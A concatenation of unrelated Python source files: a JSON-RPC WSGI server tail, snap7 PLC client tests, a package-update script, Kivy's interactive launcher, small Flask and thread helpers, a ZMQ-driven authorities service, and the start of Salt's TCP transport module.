                                'Authentication required for ' +
                                'execution_engine2 ' +
                                'but no authentication header was passed')
                            raise err
                        elif token is None and auth_req == 'optional':
                            pass
                        else:
                            try:
                                user = self.auth_client.get_user(token)
                                ctx['user_id'] = user
                                ctx['authenticated'] = 1
                                ctx['token'] = token
                            except Exception as e:
                                # Optional-auth methods proceed anonymously
                                # on a bad token; required-auth methods fail.
                                if auth_req == 'required':
                                    err = JSONServerError()
                                    err.data = \
                                        "Token validation failed: %s" % e
                                    raise err
                    if (environ.get('HTTP_X_FORWARDED_FOR')):
                        self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
                                 environ.get('HTTP_X_FORWARDED_FOR'))
                    self.log(log.INFO, ctx, 'start method')
                    rpc_result = self.rpc_service.call(ctx, req)
                    self.log(log.INFO, ctx, 'end method')
                    status = '200 OK'
                except JSONRPCError as jre:
                    err = {'error': {'code': jre.code,
                                     'name': jre.message,
                                     'message': jre.data
                                     }
                           }
                    trace = jre.trace if hasattr(jre, 'trace') else None
                    rpc_result = self.process_error(err, ctx, req, trace)
                except Exception:
                    err = {'error': {'code': 0,
                                     'name': 'Unexpected Server Error',
                                     'message': 'An unexpected server error ' +
                                                'occurred',
                                     }
                           }
                    rpc_result = self.process_error(err, ctx, req,
                                                    traceback.format_exc())
        # print('Request method was %s\n' % environ['REQUEST_METHOD'])
        # print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
        # print('Request body was: %s' % request_body)
        # print('Result from the method call is:\n%s\n' % \
        #     pprint.pformat(rpc_result))
        if rpc_result:
            response_body = rpc_result
        else:
            response_body = ''
        response_headers = [
            ('Access-Control-Allow-Origin', '*'),
            ('Access-Control-Allow-Headers', environ.get(
                'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
            ('content-type', 'application/json'),
            ('content-length', str(len(response_body)))]
        start_response(status, response_headers)
        return [response_body.encode('utf8')]

    def process_error(self, error, context, request, trace=None):
        """Log *trace* and fill in the version-appropriate error envelope,
        returning it serialized as JSON."""
        if trace:
            self.log(log.ERR, context, trace.split('\n')[0:-1])
        if 'id' in request:
            error['id'] = request['id']
        if 'version' in request:
            # JSON-RPC 1.1 style response.
            error['version'] = request['version']
            e = error['error'].get('error')
            if not e:
                error['error']['error'] = trace
        elif 'jsonrpc' in request:
            # JSON-RPC 2.0 style response.
            error['jsonrpc'] = request['jsonrpc']
            error['error']['data'] = trace
        else:
            error['version'] = '1.0'
            error['error']['error'] = trace
        return json.dumps(error)

    def now_in_utc(self):
        # noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
        """Return the local time as an ISO string with a UTC-offset suffix."""
        dtnow = datetime.datetime.now()
        dtutcnow = datetime.datetime.utcnow()
        delta = dtnow - dtutcnow
        hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
                        60)
        return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
    '''
    By default, will start the server on localhost on a system assigned port
    in the main thread. Execution of the main thread will stay in the server
    main loop until interrupted. To run the server in a separate process, and
    thus allow the stop_server method to be called, set newprocess = True. This
    will also allow returning of the port number.'''
    global _proc
    if _proc:
        raise RuntimeError('server is already running')
    httpd = make_server(host, port, application)
    # port=0 asks the OS for a free port; read back the one actually bound.
    port = httpd.server_address[1]
    print("Listening on port %s" % port)
    if newprocess:
        _proc = Process(target=httpd.serve_forever)
        # Daemonize so the child does not keep the interpreter alive on exit.
        _proc.daemon = True
        _proc.start()
    else:
        # Blocking mode: serve_forever() does not return until interrupted.
        httpd.serve_forever()
    return port
def stop_server():
    """Stop a server previously started with start_server(newprocess=True).

    Raises RuntimeError when no server process is running (the original
    raised an opaque AttributeError on None). The child is join()ed after
    terminate() so it is reaped rather than left as a zombie.
    """
    global _proc
    if _proc is None:
        raise RuntimeError('server is not running')
    _proc.terminate()
    _proc.join()
    _proc = None
def process_async_cli(input_file_path, output_file_path, token):
    """Execute one JSON-RPC request read from *input_file_path* and write the
    response JSON to *output_file_path*.

    *token*, when truthy, is validated against the auth service and attached
    to the call context. Returns 0 on success, 500 when the response carries
    an 'error' key.
    """
    exit_code = 0
    with open(input_file_path) as data_file:
        req = json.load(data_file)
    # Fill in defaults the CLI caller may have omitted.
    if 'version' not in req:
        req['version'] = '1.1'
    if 'id' not in req:
        req['id'] = str(_random.random())[2:]
    ctx = MethodContext(application.userlog)
    if token:
        user = application.auth_client.get_user(token)
        ctx['user_id'] = user
        ctx['authenticated'] = 1
        ctx['token'] = token
    if 'context' in req:
        ctx['rpc_context'] = req['context']
    # Mark the context so downstream code can tell this was a CLI call.
    ctx['CLI'] = 1
    ctx['module'], ctx['method'] = req['method'].split('.')
    prov_action = {'service': ctx['module'], 'method': ctx['method'],
                   'method_params': req['params']}
    ctx['provenance'] = [prov_action]
    resp = None
    try:
        resp = application.rpc_service.call_py(ctx, req)
    except JSONRPCError as jre:
        trace = jre.trace if hasattr(jre, 'trace') else None
        resp = {'id': req['id'],
                'version': req['version'],
                'error': {'code': jre.code,
                          'name': jre.message,
                          'message': jre.data,
                          'error': trace}
                }
    except Exception:
        trace = traceback.format_exc()
        resp = {'id': req['id'],
                'version': req['version'],
                'error': {'code': 0,
                          'name': 'Unexpected Server Error',
                          'message': 'An unexpected server error occurred',
                          'error': trace}
                }
    if 'error' in resp:
        exit_code = 500
    with open(output_file_path, "w") as f:
        f.write(json.dumps(resp, cls=JSONObjectEncoder))
    return exit_code
if __name__ == "__main__":
    # Async-CLI mode: <input.json> <output.json> [token | token-file].
    # Selected when the first argument is an existing file.
    if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
            os.path.isfile(sys.argv[1])):
        token = None
        if len(sys.argv) == 4:
            # Third argument may be either a file containing the token or
            # the token itself.
            if os.path.isfile(sys.argv[3]):
                with open(sys.argv[3]) as token_file:
                    token = token_file.read()
            else:
                token = sys.argv[3]
        sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
    # Otherwise: run the standalone HTTP server.
    try:
        opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
    except GetoptError as err:
        # print help information and exit:
        print(str(err))  # will print something like "option -a not recognized"
        sys.exit(2)
    port = 9999
    host = 'localhost'
    for o, a in opts:
        if o == '--port':
            port = int(a)
        elif o == '--host':
            host = a
            print("Host set to %s" % host)
        else:
            assert False, "unhandled option"
    start_server(host=host, port=port)
    # print("Listening on port %s" % port)
    # httpd = make_server( host, port, application)
    #
    # httpd.serve_forever()
|
test_logo_client.py | import logging
import time
import unittest
from multiprocessing import Process
import snap7
from snap7.server import mainloop
logging.basicConfig(level=logging.WARNING)
ip = '127.0.0.1'
tcpport = 1102
db_number = 1
rack = 0x1000
slot = 0x2000
class TestLogoClient(unittest.TestCase):
    """Integration tests for snap7.logo.Logo against a local snap7 test
    server started in a child process."""

    # Handle of the background server process shared by the whole class.
    process = None

    @classmethod
    def setUpClass(cls):
        cls.process = Process(target=mainloop)
        cls.process.start()
        time.sleep(2)  # wait for server to start

    @classmethod
    def tearDownClass(cls):
        cls.process.terminate()

    def setUp(self):
        self.client = snap7.logo.Logo()
        self.client.connect(ip, rack, slot, tcpport)

    def tearDown(self):
        self.client.disconnect()
        self.client.destroy()

    def test_read(self):
        """A value written to a VM address reads back unchanged."""
        vm_address = "V40"
        value = 50
        self.client.write(vm_address, value)
        result = self.client.read(vm_address)
        self.assertEqual(value, result)

    def test_write(self):
        """Writing to a VM address succeeds without raising."""
        vm_address = "V20"
        value = 8
        self.client.write(vm_address, value)

    def test_get_connected(self):
        self.client.get_connected()

    def test_set_param(self):
        """Settable client parameters accept new values; RemotePort is
        rejected while connected."""
        values = (
            (snap7.types.PingTimeout, 800),
            (snap7.types.SendTimeout, 15),
            (snap7.types.RecvTimeout, 3500),
            (snap7.types.SrcRef, 128),
            (snap7.types.DstRef, 128),
            (snap7.types.SrcTSap, 128),
            (snap7.types.PDURequest, 470),
        )
        for param, value in values:
            self.client.set_param(param, value)
        self.assertRaises(Exception, self.client.set_param,
                          snap7.types.RemotePort, 1)

    def test_get_param(self):
        """Default client parameters read back as expected; server-only
        parameters raise."""
        expected = (
            (snap7.types.RemotePort, tcpport),
            (snap7.types.PingTimeout, 750),
            (snap7.types.SendTimeout, 10),
            (snap7.types.RecvTimeout, 3000),
            (snap7.types.SrcRef, 256),
            (snap7.types.DstRef, 0),
            (snap7.types.SrcTSap, 4096),
            (snap7.types.PDURequest, 480),
        )
        for param, value in expected:
            self.assertEqual(self.client.get_param(param), value)
        non_client = (snap7.types.LocalPort, snap7.types.WorkInterval, snap7.types.MaxClients,
                      snap7.types.BSendTimeout, snap7.types.BRecvTimeout, snap7.types.RecoveryTime,
                      snap7.types.KeepAliveTime)
        # invalid param for client
        # BUGFIX: the loop previously passed the whole `non_client` tuple to
        # assertRaises instead of the current `param`, so each iteration
        # repeated the same (wrong) call and the loop variable was unused.
        for param in non_client:
            self.assertRaises(Exception, self.client.get_param, param)
class TestClientBeforeConnect(unittest.TestCase):
    """
    Test suite of items that should run without an open connection.
    """

    def setUp(self):
        self.client = snap7.client.Client()

    def test_read(self):
        """Client parameters can be set before connect() is ever called."""
        values = (
            (snap7.types.RemotePort, 1102),
            (snap7.types.PingTimeout, 800),
            (snap7.types.SendTimeout, 15),
            (snap7.types.RecvTimeout, 3500),
            (snap7.types.SrcRef, 128),
            (snap7.types.DstRef, 128),
            (snap7.types.SrcTSap, 128),
            (snap7.types.PDURequest, 470),
        )
        for param, value in values:
            self.client.set_param(param, value)
if __name__ == '__main__':
unittest.main()
|
update.py | #!/usr/bin/python3
import subprocess
import threading
import time
# import sys
before_yaourt = [
['backup.sh'],
['update_tools_helper', 'pkgfile'],
['update_tools_helper', 'abs'],
]
popens_to_wait_on = []
yaourt = [
['update_tools_helper', 'alpm'],
['yaourt', '-Sua'],
]
after_yaourt = [
['update_tools_helper', 'mlocate'],
['update_tools_helper', 'man'],
['update_tools_helper', 'units'],
]
def print_stdout(aPopen):
    """Wait for the subprocess *aPopen* to finish and print its decoded stdout.

    Popen.communicate() blocks until the process terminates and sets
    returncode, so the original `while returncode is None` loop could only
    ever run once -- and had it looped, a second communicate() would raise on
    the already-closed pipes, while the 12-second sleep only delayed thread
    exit. A single communicate() call is the correct form.
    """
    out, err = aPopen.communicate()
    print(out.decode('utf-8'))
# Launch the pre-upgrade maintenance commands in parallel; their output is
# captured and printed later by the watcher threads below.
for i in before_yaourt:
    popens_to_wait_on.append(subprocess.Popen(i, stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE))
# Run the actual package-upgrade steps sequentially in the foreground so the
# user can interact with yaourt.
for i in yaourt:
    subprocess.call(i)
# Kick off the post-upgrade helper commands in the background as well.
for i in after_yaourt:
    popens_to_wait_on.append(subprocess.Popen(i, stdout=subprocess.PIPE))
# One watcher thread per background command prints its output when done.
for i in popens_to_wait_on:
    var = threading.Thread(target=print_stdout, args=[i])
    var.start()
|
interactive.py | '''
Interactive launcher
====================
.. versionadded:: 1.3.0
.. versionchanged:: 1.9.2
The interactive launcher has been deprecated.
The :class:`InteractiveLauncher` provides a user-friendly python shell
interface to an :class:`App` so that it can be prototyped and debugged
interactively.
.. note::
The Kivy API intends for some functions to only be run once or before the
main EventLoop has started. Methods that can normally be called during the
course of an application will work as intended, but specifically overriding
methods such as :meth:`on_touch` dynamically leads to trouble.
Creating an InteractiveLauncher
-------------------------------
Take your existing subclass of :class:`App` (this can be production code) and
pass an instance to the :class:`InteractiveLauncher` constructor. ::
from kivy.interactive import InteractiveLauncher
from kivy.app import App
from kivy.uix.button import Button
class MyApp(App):
def build(self):
return Button(text='Hello Shell')
launcher = InteractiveLauncher(MyApp())
launcher.run()
After pressing *enter*, the script will return. This allows the interpreter to
continue running. Inspection or modification of the :class:`App` can be done
safely through the InteractiveLauncher instance or the provided
:class:`SafeMembrane` class instances.
.. note::
If you want to test this example, start Python without any file to have
already an interpreter, and copy/paste all the lines. You'll still have the
interpreter at the end + the kivy application running.
Interactive Development
-----------------------
IPython provides a fast way to learn the Kivy API. The :class:`App` instance
and all of its attributes, including methods and the entire widget tree,
can be quickly listed by using the '.' operator and pressing 'tab'. Try this
code in an IPython shell. ::
from kivy.interactive import InteractiveLauncher
from kivy.app import App
from kivy.uix.widget import Widget
from kivy.graphics import Color, Ellipse
class MyPaintWidget(Widget):
def on_touch_down(self, touch):
with self.canvas:
Color(1, 1, 0)
d = 30.
Ellipse(pos=(touch.x - d/2, touch.y - d/2), size=(d, d))
class TestApp(App):
def build(self):
return Widget()
i = InteractiveLauncher(TestApp())
i.run()
i. # press 'tab' to list attributes of the app
i.root. # press 'tab' to list attributes of the root widget
# App is boring. Attach a new widget!
i.root.add_widget(MyPaintWidget())
i.safeIn()
# The application is now blocked.
# Click on the screen several times.
i.safeOut()
# The clicks will show up now
# Erase artwork and start over
i.root.canvas.clear()
.. note::
All of the proxies used in the module store their referent in the
:attr:`_ref` attribute, which can be accessed directly if needed, such as
for getting doc strings. :func:`help` and :func:`type` will access the
proxy, not its referent.
Directly Pausing the Application
--------------------------------
Both the :class:`InteractiveLauncher` and :class:`SafeMembrane` hold internal
references to the :class:`EventLoop`'s 'safe' and 'confirmed'
:class:`threading.Event` objects. You can use their safing methods to control
the application manually.
:meth:`SafeMembrane.safeIn` will cause the application to pause and
:meth:`SafeMembrane.safeOut` will allow a paused application
to continue running. This is potentially useful for scripting actions into
functions that need the screen to update etc.
.. note::
The pausing is implemented via the
:class:`Clock's <kivy.clock.Clock>`
:meth:`~kivy.clock.ClockBase.schedule_once` method
and occurs before the start of each frame.
Adding Attributes Dynamically
-----------------------------
.. note::
This module uses threading and object proxies to encapsulate the running
:class:`App`. Deadlocks and memory corruption can occur if making direct
references inside the thread without going through the provided proxy(s).
The :class:`InteractiveLauncher` can have attributes added to it exactly like a
normal object and if these were created from outside the membrane, they will
not be threadsafe because the external references to them in the python
interpreter do not go through InteractiveLauncher's membrane behavior,
inherited from :class:`SafeMembrane`.
To threadsafe these external references, simply assign them to
:class:`SafeMembrane` instances of themselves like so::
from kivy.interactive import SafeMembrane
interactiveLauncher.attribute = myNewObject
# myNewObject is unsafe
myNewObject = SafeMembrane(myNewObject)
# myNewObject is now safe. Call at will.
myNewObject.method()
TODO
====
Unit tests, examples, and a better explanation of which methods are safe in a
running application would be nice. All three would be excellent.
Could be re-written with a context-manager style i.e. ::
with safe:
foo()
Any use cases besides compacting code?
'''
__all__ = ('SafeMembrane', 'InteractiveLauncher')
import inspect
from threading import Thread, Event
from kivy.app import App
from kivy.base import EventLoop
from kivy.clock import Clock
from kivy.utils import deprecated
def safeWait(dt):
    # Runs on the Kivy main loop (scheduled by SafeMembrane.safeIn): signal
    # that the app has paused, then block this frame until the interactive
    # thread sets the 'safe' event again.
    EventLoop.confirmed.set()
    EventLoop.safe.wait()
    EventLoop.confirmed.clear()
def unwrap(ob):
    """Strip any nested SafeMembrane wrappers and return the raw referent."""
    # NOTE: the exact `type(ob) ==` check is deliberate -- SafeMembrane
    # forwards dunder attribute access (including __class__) to its referent,
    # so an isinstance() check could be answered by the referent instead of
    # the proxy; type() always sees the proxy object itself.
    while type(ob) == SafeMembrane:
        ob = ob._ref
    return ob
class SafeMembrane(object):
    '''
    This help is for a proxy object. Did you want help on the proxy's referent
    instead? Try using help(<instance>._ref)

    The SafeMembrane is a threadsafe proxy that also returns attributes as new
    thread-safe objects
    and makes thread-safe method calls, preventing thread-unsafe objects
    from leaking into the user's environment.
    '''
    __slots__ = ('_ref', 'safe', 'confirmed')

    def __init__(self, ob, *args, **kwargs):
        # Share the EventLoop's safing events so that every membrane drives
        # the same pause/resume handshake with the main loop.
        self.confirmed = EventLoop.confirmed
        self.safe = EventLoop.safe
        self._ref = ob

    def safeIn(self):
        """Provides a thread-safe entry point for interactive launching."""
        # Clear 'safe' so the next frame blocks inside safeWait(), then wait
        # for the main loop to confirm it has actually paused.
        self.safe.clear()
        Clock.schedule_once(safeWait, -1)
        self.confirmed.wait()

    def safeOut(self):
        """Provides a thread-safe exit point for interactive launching."""
        self.safe.set()

    def isMethod(self, fn):
        return inspect.ismethod(fn)

    # Everything from this point on is just a series of thread-safing proxy
    # methods that make calls against _ref and threadsafe whenever data will be
    # written to or if a method will be called. SafeMembrane instances should
    # be unwrapped whenever passing them into the thread
    #use type() to determine if an object is a SafeMembrane while debugging
    def __repr__(self):
        return self._ref.__repr__()

    def __call__(self, *args, **kw):
        # Pause the app, strip membranes off every argument, call the
        # referent, resume; non-None results come back re-wrapped.
        self.safeIn()
        args = list(map(unwrap, args))
        for k in list(kw.keys()):
            kw[k] = unwrap(kw[k])
        r = self._ref(*args, **kw)
        self.safeOut()
        if r is not None:
            return SafeMembrane(r)

    def __getattribute__(self, attr, oga=object.__getattribute__):
        # Dunder names (and '_ref' itself) are answered from the referent so
        # the proxy stays largely transparent to introspection.
        if attr.startswith('__') or attr == '_ref':
            subject = oga(self, '_ref')
            if attr == '_ref':
                return subject
            return getattr(subject, attr)
        return oga(self, attr)

    def __getattr__(self, attr, oga=object.__getattribute__):
        # Regular attributes are fetched from the referent and wrapped in a
        # new membrane so they stay thread-safe.
        r = getattr(oga(self, '_ref'), attr)
        return SafeMembrane(r)

    def __setattr__(self, attr, val, osa=object.__setattr__):
        if (attr == '_ref'
                or hasattr(type(self), attr) and not attr.startswith('__')):
            # The membrane's own slots are written directly.
            osa(self, attr, val)
        else:
            # Writes onto the referent happen while the app is paused.
            self.safeIn()
            val = unwrap(val)
            setattr(self._ref, attr, val)
            self.safeOut()

    def __delattr__(self, attr, oda=object.__delattr__):
        self.safeIn()
        delattr(self._ref, attr)
        self.safeOut()

    def __bool__(self):
        return bool(self._ref)

    def __getitem__(self, arg):
        return SafeMembrane(self._ref[arg])

    def __setitem__(self, arg, val):
        self.safeIn()
        val = unwrap(val)
        self._ref[arg] = val
        self.safeOut()

    def __delitem__(self, arg):
        self.safeIn()
        del self._ref[arg]
        self.safeOut()

    # The three __*slice__ methods below are the Python 2 slice protocol,
    # kept for backwards compatibility.
    def __getslice__(self, i, j):
        return SafeMembrane(self._ref[i:j])

    def __setslice__(self, i, j, val):
        self.safeIn()
        val = unwrap(val)
        self._ref[i:j] = val
        self.safeOut()

    def __delslice__(self, i, j):
        self.safeIn()
        del self._ref[i:j]
        self.safeOut()

    def __enter__(self, *args, **kwargs):
        self.safeIn()
        self._ref.__enter__(*args, **kwargs)

    def __exit__(self, *args, **kwargs):
        self._ref.__exit__(*args, **kwargs)
        self.safeOut()
class InteractiveLauncher(SafeMembrane):
    '''
    Proxy to an application instance that launches it in a thread and
    then returns and acts as a proxy to the application in the thread.
    '''
    __slots__ = ('_ref', 'safe', 'confirmed', 'thread', 'app')

    @deprecated
    def __init__(self, app=None, *args, **kwargs):
        if app is None:
            app = App()
        # Install the safing events on the EventLoop; 'safe' starts set so
        # the app runs freely until safeIn() is called.
        EventLoop.safe = Event()
        self.safe = EventLoop.safe
        self.safe.set()
        EventLoop.confirmed = Event()
        self.confirmed = EventLoop.confirmed
        self.app = app

        def startApp(app=app, *args, **kwargs):
            app.run(*args, **kwargs)

        self.thread = Thread(target=startApp, *args, **kwargs)

    def run(self):
        """Start the app thread and switch on proxy behaviour."""
        self.thread.start()
        #Proxy behavior starts after this is set. Before this point, attaching
        #widgets etc can only be done through the Launcher's app attribute
        self._ref = self.app

    def stop(self):
        """Ask the EventLoop to quit and wait for the app thread to exit."""
        EventLoop.quit = True
        self.thread.join()

    #Act like the app instance even before _ref is set
    def __repr__(self):
        return self.app.__repr__()
|
start_software.py | import os
from subprocess import call, STDOUT
from threading import Thread
# Sink for child-process output; stays open for the life of the module.
FNULL = open(os.devnull, 'w')
def start_software(*args):
    """Launch the given command in a background thread, discarding its
    stdout and stderr (stderr is merged into the discarded stdout)."""
    worker = Thread(target=call, args=args,
                    kwargs={'stdout': FNULL, 'stderr': STDOUT})
    worker.start()
|
keep_alive.py | from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
    """Landing page served at '/', mainly hit by uptime monitors."""
    greeting = "Hello, what are you doing here? Anyway congrats, you found the secret webpage :D"
    return greeting
def run():
    """Serve the Flask app on all interfaces, port 8080 (blocking call)."""
    app.run(host='0.0.0.0', port=8080)
def keep_alive():
    """Start the web server in a background thread and return immediately."""
    server_thread = Thread(target=run)
    server_thread.start()
|
authorities.py | #
# MySlice version 2
#
# Authorities service: manages authority scope events
#
# (c) 2016 Ciro Scognamiglio <ciro.scognamiglio@lip6.fr>, Loïc Baron <loic.baron@lip6.fr>
##
import pprint
import signal
import threading
from queue import Queue
from myslice.db.activity import Event, ObjectType
import rethinkdb as r
from myslice.db import connect, changes, events
from myslice.services.workers.authorities import events_run as manageAuthoritiesEvents
from myslice.services.workers.authorities import sync as syncAuthorities
import myslice.lib.log as logging
from myslice import config
import zmq
import pickle
logger = logging.getLogger()
def receive_signal(signum, stack):
    """Signal handler: log the received signal and abort the service loop
    by raising SystemExit."""
    logger.info('Received signal %s', signum)
    raise SystemExit('Exiting')
def run():
    """
    Service entry point: start the authority worker threads, then consume
    'authorities' activity events from the ZMQ bus forever, dispatching
    each one onto the shared event queue.
    """
    # Exit cleanly (via SystemExit in receive_signal) on common signals.
    signal.signal(signal.SIGINT, receive_signal)
    signal.signal(signal.SIGTERM, receive_signal)
    signal.signal(signal.SIGHUP, receive_signal)
    # db connection is shared between threads
    qAuthorityEvents = Queue()
    lock = threading.Lock()
    threads = []
    # One event-manager worker; range(1) keeps the pool size tweakable.
    for y in range(1):
        t = threading.Thread(target=manageAuthoritiesEvents, args=(lock, qAuthorityEvents))
        t.daemon = True
        threads.append(t)
        t.start()
    # Optional periodic sync worker, enabled via configuration.
    if config.services['authorities']['sync']:
        for y in range(1):
            t = threading.Thread(target=syncAuthorities, args=(lock, ))
            t.daemon = True
            threads.append(t)
            t.start()
    # Subscribe to the 'authorities' topic on the local ZMQ activity bus.
    context = zmq.Context()
    socket = context.socket(zmq.SUB)
    socket.setsockopt_string(zmq.SUBSCRIBE, 'authorities')
    socket.connect("tcp://localhost:6002")
    logger.info("[authorities] Collecting updates from ZMQ bus for activity")
    while True:
        logger.debug("[authorities]Change in authorities feed")
        topic, zmqmessage = socket.recv_multipart()
        # NOTE(review): pickle.loads on bus payloads is only safe while the
        # bus is local and trusted.
        activity = pickle.loads(zmqmessage)
        logger.debug("[authorities]{0}: {1}".format(topic, activity))
        try:
            event = Event(activity['new_val'])
            logger.debug("[authorities] Add event %s to %s queue" % (event.id, event.object.type))
            qAuthorityEvents.put(event)
        except Exception as e:
            # Malformed activity: log details and keep consuming the feed.
            import traceback
            traceback.print_exc()
            logger.exception(e)
            if 'new_val' in activity and 'id' in activity['new_val']:
                logger.error("[authorities] Problem with event: {}".format(activity['new_val']['id']))
            else:
                logger.error("[authorities] Event is malformed: {}".format(activity))
            continue
    # NOTE(review): unreachable -- the loop above never breaks; shutdown
    # happens via the SystemExit raised in receive_signal.
    logger.critical("[authorities] Service authorities stopped")
    for x in threads:
        x.join()
|
tcp.py | # -*- coding: utf-8 -*-
'''
TCP transport classes
Wire protocol: "len(payload) msgpack({'head': SOMEHEADER, 'body': SOMEBODY})"
'''
# Import Python Libs
from __future__ import absolute_import, print_function, unicode_literals
import errno
import logging
import os
import socket
import sys
import time
import threading
import traceback
import weakref
# Import Salt Libs
import salt.crypt
import salt.utils.asynchronous
import salt.utils.event
import salt.utils.files
import salt.utils.msgpack
import salt.utils.platform
import salt.utils.process
import salt.utils.verify
import salt.payload
import salt.exceptions
import salt.transport.frame
import salt.transport.ipc
import salt.transport.client
import salt.transport.server
import salt.transport.mixins.auth
from salt.ext import six
from salt.ext.six.moves import queue # pylint: disable=import-error
from salt.exceptions import SaltReqTimeoutError, SaltClientError
from salt.transport import iter_transport_opts
# Import Tornado Libs
import tornado
import tornado.tcpserver
import tornado.gen
import tornado.concurrent
import tornado.tcpclient
import tornado.netutil
import tornado.iostream
# pylint: disable=import-error,no-name-in-module
if six.PY2:
import urlparse
else:
import urllib.parse as urlparse
# pylint: enable=import-error,no-name-in-module
# Import third party libs
try:
from M2Crypto import RSA
HAS_M2 = True
except ImportError:
HAS_M2 = False
try:
from Cryptodome.Cipher import PKCS1_OAEP
except ImportError:
from Crypto.Cipher import PKCS1_OAEP
if six.PY3 and salt.utils.platform.is_windows():
USE_LOAD_BALANCER = True
else:
USE_LOAD_BALANCER = False
if USE_LOAD_BALANCER:
import threading
import multiprocessing
import tornado.util
from salt.utils.process import SignalHandlingProcess
log = logging.getLogger(__name__)
def _set_tcp_keepalive(sock, opts):
    '''
    Ensure that TCP keepalives are set for the socket.

    Keepalive is toggled by ``opts['tcp_keepalive']``; the tuning values
    (``tcp_keepalive_idle``/``cnt``/``intvl``) default to -1 and are only
    applied when positive.
    '''
    if hasattr(socket, 'SO_KEEPALIVE'):
        if opts.get('tcp_keepalive', False):
            sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
            # Per-option feature detection: not every platform exposes all
            # of the TCP_KEEP* constants.
            if hasattr(socket, 'SOL_TCP'):
                if hasattr(socket, 'TCP_KEEPIDLE'):
                    tcp_keepalive_idle = opts.get('tcp_keepalive_idle', -1)
                    if tcp_keepalive_idle > 0:
                        sock.setsockopt(
                            socket.SOL_TCP, socket.TCP_KEEPIDLE,
                            int(tcp_keepalive_idle))
                if hasattr(socket, 'TCP_KEEPCNT'):
                    tcp_keepalive_cnt = opts.get('tcp_keepalive_cnt', -1)
                    if tcp_keepalive_cnt > 0:
                        sock.setsockopt(
                            socket.SOL_TCP, socket.TCP_KEEPCNT,
                            int(tcp_keepalive_cnt))
                if hasattr(socket, 'TCP_KEEPINTVL'):
                    tcp_keepalive_intvl = opts.get('tcp_keepalive_intvl', -1)
                    if tcp_keepalive_intvl > 0:
                        sock.setsockopt(
                            socket.SOL_TCP, socket.TCP_KEEPINTVL,
                            int(tcp_keepalive_intvl))
            if hasattr(socket, 'SIO_KEEPALIVE_VALS'):
                # Windows doesn't support TCP_KEEPIDLE, TCP_KEEPCNT, nor
                # TCP_KEEPINTVL. Instead, it has its own proprietary
                # SIO_KEEPALIVE_VALS.
                tcp_keepalive_idle = opts.get('tcp_keepalive_idle', -1)
                tcp_keepalive_intvl = opts.get('tcp_keepalive_intvl', -1)
                # Windows doesn't support changing something equivalent to
                # TCP_KEEPCNT.
                if tcp_keepalive_idle > 0 or tcp_keepalive_intvl > 0:
                    # Windows defaults may be found by using the link below.
                    # Search for 'KeepAliveTime' and 'KeepAliveInterval'.
                    # https://technet.microsoft.com/en-us/library/bb726981.aspx#EDAA
                    # If one value is set and the other isn't, we still need
                    # to send both values to SIO_KEEPALIVE_VALS and they both
                    # need to be valid. So in that case, use the Windows
                    # default.
                    if tcp_keepalive_idle <= 0:
                        tcp_keepalive_idle = 7200
                    if tcp_keepalive_intvl <= 0:
                        tcp_keepalive_intvl = 1
                    # The values expected are in milliseconds, so multiply by
                    # 1000.
                    sock.ioctl(socket.SIO_KEEPALIVE_VALS, (
                        1, int(tcp_keepalive_idle * 1000),
                        int(tcp_keepalive_intvl * 1000)))
        else:
            sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 0)
if USE_LOAD_BALANCER:
    class LoadBalancerServer(SignalHandlingProcess):
        '''
        Raw TCP server which runs in its own process and will listen
        for incoming connections. Each incoming connection will be
        sent via multiprocessing queue to the workers.
        Since the queue is shared amongst workers, only one worker will
        handle a given connection.
        '''
        # TODO: opts!
        # Based on default used in tornado.netutil.bind_sockets()
        backlog = 128
        def __init__(self, opts, socket_queue, **kwargs):
            # socket_queue: multiprocessing queue shared with the workers.
            super(LoadBalancerServer, self).__init__(**kwargs)
            self.opts = opts
            self.socket_queue = socket_queue
            self._socket = None
        # __setstate__ and __getstate__ are only used on Windows.
        # We do this so that __init__ will be invoked on Windows in the child
        # process so that a register_after_fork() equivalent will work on
        # Windows.
        def __setstate__(self, state):
            self.__init__(
                state['opts'],
                state['socket_queue'],
                log_queue=state['log_queue'],
                log_queue_level=state['log_queue_level']
            )
        def __getstate__(self):
            return {
                'opts': self.opts,
                'socket_queue': self.socket_queue,
                'log_queue': self.log_queue,
                'log_queue_level': self.log_queue_level
            }
        def close(self):
            # Idempotent: safe to call repeatedly / from __del__.
            if self._socket is not None:
                self._socket.shutdown(socket.SHUT_RDWR)
                self._socket.close()
                self._socket = None
        # pylint: disable=W1701
        def __del__(self):
            self.close()
        # pylint: enable=W1701
        def run(self):
            '''
            Start the load balancer
            '''
            self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            _set_tcp_keepalive(self._socket, self.opts)
            self._socket.setblocking(1)
            self._socket.bind((self.opts['interface'], int(self.opts['ret_port'])))
